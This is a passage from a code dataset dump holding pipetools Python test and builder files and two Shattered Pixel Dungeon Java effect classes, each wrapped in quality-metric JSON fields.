"qsc_codejava_score_lines_no_logic": 0.05301205, "qsc_codejava_frac_words_no_modifier": 0.66666667, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
0101/pipetools | test_pipetools/test_utils.py | from pipetools import X, sort_by, take_first, foreach, where, select_first, group_by
from pipetools import unless, flatten, take_until, as_kwargs, drop_first, tee
from pipetools.compat import range
class TestPipeUtil:
def test_pipability(self):
f = range | foreach(X) | sum
result = f(4)
assert result == 6
def test_input(self):
result = range(5) > where(X % 2) | list
assert result == [1, 3]
class TestSortBy:
def test_x(self):
result = sort_by(-X[1])(zip('what', [1, 2, 3, 4]))
assert result == [
('t', 4),
('a', 3),
('h', 2),
('w', 1),
]
def test_descending(self):
result = zip('what', [1, 2, 3, 4]) > sort_by(X[1]).descending
assert result == [
('t', 4),
('a', 3),
('h', 2),
('w', 1),
]
class TestTakeFirst:
def test_take_first(self):
assert [0, 1, 2] == list(take_first(3)(range(10)))
class TestTupleMaker:
def test_make_tuple(self):
result = [1, 2, 3] > foreach((X, X % 2)) | list
assert result == [(1, 1), (2, 0), (3, 1)]
class TestListMaker:
def test_make_list(self):
result = [1, 2, 3] > foreach([X, X % 2]) | list
assert result == [[1, 1], [2, 0], [3, 1]]
class TestDictMaker:
def test_make_dict(self):
result = [1, 2] > foreach({'num': X, 'str': str}) | list
assert result == [{'num': 1, 'str': '1'}, {'num': 2, 'str': '2'}]
class TestSelectFirst:
def test_select_first(self):
result = select_first(X % 2 == 0)([3, 4, 5, 6])
assert result == 4
def test_select_first_none(self):
result = select_first(X == 2)([0, 1, 0, 1])
assert result is None
def test_select_first_empty(self):
assert select_first(X)([]) is None
class TestAutoStringFormatter:
def test_foreach_format(self):
result = [1, 2] > foreach("Number {0}") | list
assert result == ['Number 1', 'Number 2']
class TestUnless:
def test_ok(self):
f = unless(AttributeError, foreach(X.lower())) | list
assert f("ABC") == ['a', 'b', 'c']
def test_with_exception(self):
f = unless(AttributeError, foreach(X.lower()) | list)
assert f(['A', 'B', 37]) is None
def test_with_exception_in_foreach(self):
f = foreach(unless(AttributeError, X.lower())) | list
assert f(['A', 'B', 37]) == ['a', 'b', None]
def test_partial_ok(self):
f = unless(TypeError, enumerate, start=3) | list
assert f('abc') == [(3, 'a'), (4, 'b'), (5, 'c')]
def test_partial_exc(self):
f = unless(TypeError, enumerate, start=3)
assert f(42) is None
def test_X_ok(self):
f = unless(TypeError, X * 'x')
assert f(3) == 'xxx'
def test_X_exception(self):
f = unless(TypeError, X * 'x')
assert f('x') is None
class TestFlatten:
def test_flatten(self):
assert (list(flatten([1, [2, 3], (4, ('five', 6))]))
== [1, 2, 3, 4, 'five', 6])
def test_flatten_args(self):
assert (list(flatten(1, [2, 3], (4, ('five', 6))))
== [1, 2, 3, 4, 'five', 6])
def test_flatten_dict(self):
assert (list(flatten([[{'a': 1}], {'b': 2}, 'c'], {'d': 3}))
== [{'a': 1}, {'b': 2}, 'c', {'d': 3}])
class TestTakeUntil:
def test_basic(self):
f = take_until(X > 5)
assert list(f([1, 2, 3, 1, 6, 1, 3])) == [1, 2, 3, 1]
def test_including(self):
f = take_until(X > 5).including
assert ([1, 2, 3, 1, 6, 1, 3] > f | list) == [1, 2, 3, 1, 6]
def test_including_all(self):
f = take_until(X > 50).including
assert ([1, 2, 3, 1, 6, 1, 3] > f | list) == [1, 2, 3, 1, 6, 1, 3]
class TestAsKwargs:
def test_as_kwargs(self):
d = {'foo': 4, 'bar': 2}
assert as_kwargs(lambda **kw: kw)(d) == d
class TestRegexCondidion:
def test_where_regex(self):
data = [
'foo bar',
'boo far',
'foolproof',
]
assert (data > where(r'^foo') | list) == [
'foo bar',
'foolproof',
]
def test_select_first_regex(self):
data = [
'foo bar',
'boo far',
'foolproof',
]
assert (data > select_first(r'^b.*r$')) == 'boo far'
def test_none_doesnt_match(self):
data = [
'foo bar',
'boo far',
None,
'foolproof',
]
assert (data > where(r'^foo') | list) == [
'foo bar',
'foolproof',
]
class TestGroupBy:
def test_basic(self):
src = [1, 2, 3, 4, 5, 6]
assert (src > group_by(X % 2) | dict) == {0: [2, 4, 6], 1: [1, 3, 5]}
class TestDropFirst:
def test_list(self):
src = [1, 2, 3, 4, 5, 6]
assert (src > drop_first(3) | list) == [4, 5, 6]
def test_iterable(self):
assert (range(10000) > drop_first(9999) | list) == [9999]
class TestTee:
def test_tee(self):
store = []
result = "input" > X | tee(X | reversed | "".join | store.append) | X[2:]
assert store == ["tupni"]
assert result == "put"
| 5,301 | test_utils | py | en | python | code | {"qsc_code_num_words": 716, "qsc_code_num_chars": 5301.0, "qsc_code_mean_word_length": 3.58379888, "qsc_code_frac_words_unique": 0.16620112, "qsc_code_frac_chars_top_2grams": 0.09002338, "qsc_code_frac_chars_top_3grams": 0.01870616, "qsc_code_frac_chars_top_4grams": 0.01247077, "qsc_code_frac_chars_dupe_5grams": 0.3893219, "qsc_code_frac_chars_dupe_6grams": 0.36321122, "qsc_code_frac_chars_dupe_7grams": 0.32696804, "qsc_code_frac_chars_dupe_8grams": 0.27201871, "qsc_code_frac_chars_dupe_9grams": 0.23967264, "qsc_code_frac_chars_dupe_10grams": 0.23967264, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.05377542, "qsc_code_frac_chars_whitespace": 0.32295793, "qsc_code_size_file_byte": 5301.0, "qsc_code_num_lines": 219.0, "qsc_code_num_chars_line_max": 85.0, "qsc_code_num_chars_line_mean": 24.20547945, "qsc_code_frac_chars_alphabet": 0.66118696, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.24489796, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.04734956, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.23129252, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.2244898, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.02040816, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.3537415, "qsc_codepython_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 1, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
0101/pipetools | test_pipetools/test_decorators.py | from pipetools import foreach, sort_by, X, unless
from pipetools.compat import range
def my_func(*args, **kwargs):
pass
def test_pipe_util_xpartial():
f = range | foreach(range, X, 0, -1) | foreach(list) | list
assert f(3, 5) == [[3, 2, 1], [4, 3, 2, 1]]
class TestPipeUtilsRepr:
def test_basic(self):
f = foreach(my_func)
assert repr(f) == 'foreach(my_func)'
def test_partially_applied(self):
f = foreach(my_func, 42, kwarg=2)
assert repr(f) == 'foreach(my_func, 42, kwarg=2)'
def test_string_formatting(self):
f = foreach("{0} asdf {1} jk;l")
assert repr(f) == "foreach('{0} asdf {1} jk;l')"
def test_ds_builder(self):
f = sort_by([X.attr, X * 2])
assert repr(f) == 'sort_by([X.attr, X * 2])'
def test_repr_doesnt_get_called_when_not_necessary(self):
class Something(object):
def __repr__(self):
assert False, "__repr__ called when not necessary"
foreach(Something())
unless(Exception, Something())
| 1,063 | test_decorators | py | en | python | code | {"qsc_code_num_words": 152, "qsc_code_num_chars": 1063.0, "qsc_code_mean_word_length": 3.99342105, "qsc_code_frac_words_unique": 0.36842105, "qsc_code_frac_chars_top_2grams": 0.06919275, "qsc_code_frac_chars_top_3grams": 0.06589786, "qsc_code_frac_chars_top_4grams": 0.092257, "qsc_code_frac_chars_dupe_5grams": 0.26688633, "qsc_code_frac_chars_dupe_6grams": 0.2306425, "qsc_code_frac_chars_dupe_7grams": 0.17462932, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02907712, "qsc_code_frac_chars_whitespace": 0.25587959, "qsc_code_size_file_byte": 1063.0, "qsc_code_num_lines": 40.0, "qsc_code_num_chars_line_max": 67.0, "qsc_code_num_chars_line_mean": 26.575, "qsc_code_frac_chars_alphabet": 0.73830594, "qsc_code_frac_chars_comments": 0.0, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.1392286, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.23076923, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.30769231, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.03846154, "qsc_codepython_frac_lines_import": 0.07692308, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.46153846, "qsc_codepython_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 1, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
0101/pipetools | pipetools/ds_builder.py | from functools import partial
from pipetools.main import XObject, StringFormatter
from pipetools.compat import string_types, dict_items
class NoBuilder(ValueError):
pass
def DSBuilder(definition):
builder = select_builder(definition)
if builder:
return builder(definition)
raise NoBuilder("Don't know how to build %s" % type(definition))
def SequenceBuilder(cls, definition):
return lambda x: cls(ds_item(d, x) for d in definition)
def DictBuilder(definition):
return lambda x: dict(
(ds_item(key_def, x), ds_item(val_def, x))
for key_def, val_def in dict_items(definition))
builders = {
tuple: partial(SequenceBuilder, tuple),
list: partial(SequenceBuilder, list),
dict: DictBuilder,
}
def select_builder(definition):
for cls, builder in dict_items(builders):
if isinstance(definition, cls):
return builder
def ds_item(definition, data):
if isinstance(definition, XObject):
return (~definition)(data)
if isinstance(definition, string_types):
return StringFormatter(definition)(data)
if callable(definition):
return definition(data)
try:
return DSBuilder(definition)(data)
except NoBuilder:
# static item
return definition
| 1,290 | ds_builder | py | en | python | code | {"qsc_code_num_words": 153, "qsc_code_num_chars": 1290.0, "qsc_code_mean_word_length": 5.77124183, "qsc_code_frac_words_unique": 0.35294118, "qsc_code_frac_chars_top_2grams": 0.0792752, "qsc_code_frac_chars_top_3grams": 0.07474519, "qsc_code_frac_chars_top_4grams": 0.05209513, "qsc_code_frac_chars_dupe_5grams": 0.0815402, "qsc_code_frac_chars_dupe_6grams": 0.0, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0, "qsc_code_frac_chars_whitespace": 0.21705426, "qsc_code_size_file_byte": 1290.0, "qsc_code_num_lines": 52.0, "qsc_code_num_chars_line_max": 69.0, "qsc_code_num_chars_line_mean": 24.80769231, "qsc_code_frac_chars_alphabet": 0.87425743, "qsc_code_frac_chars_comments": 0.00852713, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.02036022, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.13888889, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.02777778, "qsc_codepython_frac_lines_import": 0.08333333, "qsc_codepython_frac_lines_simplefunc": 0.05555555555555555, "qsc_codepython_score_lines_no_logic": 0.5, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/SpellSprite.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.Game;
import com.watabou.noosa.Image;
import com.watabou.noosa.TextureFilm;
import java.util.HashMap;
public class SpellSprite extends Image {
public static final int FOOD = 0;
public static final int MAP = 1;
public static final int CHARGE = 2;
public static final int MASTERY = 3;
public static final int BERSERK = 4;
private static final int SIZE = 16;
private enum Phase {
FADE_IN, STATIC, FADE_OUT
}
private static final float FADE_IN_TIME = 0.2f;
private static final float STATIC_TIME = 0.8f;
private static final float FADE_OUT_TIME = 0.4f;
private static TextureFilm film;
private Char target;
private Phase phase;
private float duration;
private float passed;
private static HashMap<Char,SpellSprite> all = new HashMap<>();
public SpellSprite() {
super( Assets.SPELL_ICONS );
if (film == null) {
film = new TextureFilm( texture, SIZE );
}
}
public void reset( int index ) {
frame( film.get( index ) );
origin.set( width / 2, height / 2 );
phase = Phase.FADE_IN;
duration = FADE_IN_TIME;
passed = 0;
}
@Override
public void update() {
super.update();
if (target.sprite != null) {
x = target.sprite.center().x - SIZE / 2;
y = target.sprite.y - SIZE;
}
switch (phase) {
case FADE_IN:
alpha( passed / duration );
scale.set( passed / duration );
break;
case STATIC:
break;
case FADE_OUT:
alpha( 1 - passed / duration );
break;
}
if ((passed += Game.elapsed) > duration) {
switch (phase) {
case FADE_IN:
phase = Phase.STATIC;
duration = STATIC_TIME;
break;
case STATIC:
phase = Phase.FADE_OUT;
duration = FADE_OUT_TIME;
break;
case FADE_OUT:
kill();
break;
}
passed = 0;
}
}
@Override
public void kill() {
super.kill();
all.remove( target );
}
public static void show( Char ch, int index ) {
if (!ch.sprite.visible) {
return;
}
SpellSprite old = all.get( ch );
if (old != null) {
old.kill();
}
SpellSprite sprite = GameScene.spellSprite();
sprite.revive();
sprite.reset( index );
sprite.target = ch;
all.put( ch, sprite );
}
}
| 3,224 | SpellSprite | java | en | java | code | {"qsc_code_num_words": 429, "qsc_code_num_chars": 3224.0, "qsc_code_mean_word_length": 5.06526807, "qsc_code_frac_words_unique": 0.38461538, "qsc_code_frac_chars_top_2grams": 0.04555913, "qsc_code_frac_chars_top_3grams": 0.03865624, "qsc_code_frac_chars_top_4grams": 0.04601933, "qsc_code_frac_chars_dupe_5grams": 0.10492407, "qsc_code_frac_chars_dupe_6grams": 0.02577082, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01434263, "qsc_code_frac_chars_whitespace": 0.22146402, "qsc_code_size_file_byte": 3224.0, "qsc_code_num_lines": 141.0, "qsc_code_num_chars_line_max": 72.0, "qsc_code_num_chars_line_mean": 22.86524823, "qsc_code_frac_chars_alphabet": 0.85139442, "qsc_code_frac_chars_comments": 0.24224566, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.18947368, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.04210526, "qsc_codejava_score_lines_no_logic": 0.18947368, "qsc_codejava_frac_words_no_modifier": 0.8, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/effects/CellEmitter.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.effects;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.watabou.noosa.particles.Emitter;
import com.watabou.utils.PointF;
public class CellEmitter {
public static Emitter get( int cell ) {
PointF p = DungeonTilemap.tileToWorld( cell );
Emitter emitter = GameScene.emitter();
emitter.pos( p.x, p.y, DungeonTilemap.SIZE, DungeonTilemap.SIZE );
return emitter;
}
public static Emitter center( int cell ) {
PointF p = DungeonTilemap.tileToWorld( cell );
Emitter emitter = GameScene.emitter();
emitter.pos( p.x + DungeonTilemap.SIZE / 2, p.y + DungeonTilemap.SIZE / 2 );
return emitter;
}
public static Emitter bottom( int cell ) {
PointF p = DungeonTilemap.tileToWorld( cell );
Emitter emitter = GameScene.emitter();
emitter.pos( p.x, p.y + DungeonTilemap.SIZE, DungeonTilemap.SIZE, 0 );
return emitter;
}
}
| 1,799 | CellEmitter | java | en | java | code | {"qsc_code_num_words": 236, "qsc_code_num_chars": 1799.0, "qsc_code_mean_word_length": 5.58898305, "qsc_code_frac_words_unique": 0.47033898, "qsc_code_frac_chars_top_2grams": 0.06368461, "qsc_code_frac_chars_top_3grams": 0.02956785, "qsc_code_frac_chars_top_4grams": 0.04321456, "qsc_code_frac_chars_dupe_5grams": 0.3616376, "qsc_code_frac_chars_dupe_6grams": 0.29340409, "qsc_code_frac_chars_dupe_7grams": 0.25094769, "qsc_code_frac_chars_dupe_8grams": 0.25094769, "qsc_code_frac_chars_dupe_9grams": 0.25094769, "qsc_code_frac_chars_dupe_10grams": 0.25094769, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01355932, "qsc_code_frac_chars_whitespace": 0.18010006, "qsc_code_size_file_byte": 1799.0, "qsc_code_num_lines": 59.0, "qsc_code_num_chars_line_max": 79.0, "qsc_code_num_chars_line_mean": 30.49152542, "qsc_code_frac_chars_alphabet": 0.88067797, "qsc_code_frac_chars_comments": 0.43413007, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.36, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.12, "qsc_codejava_score_lines_no_logic": 0.44, "qsc_codejava_frac_words_no_modifier": 0.75, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, 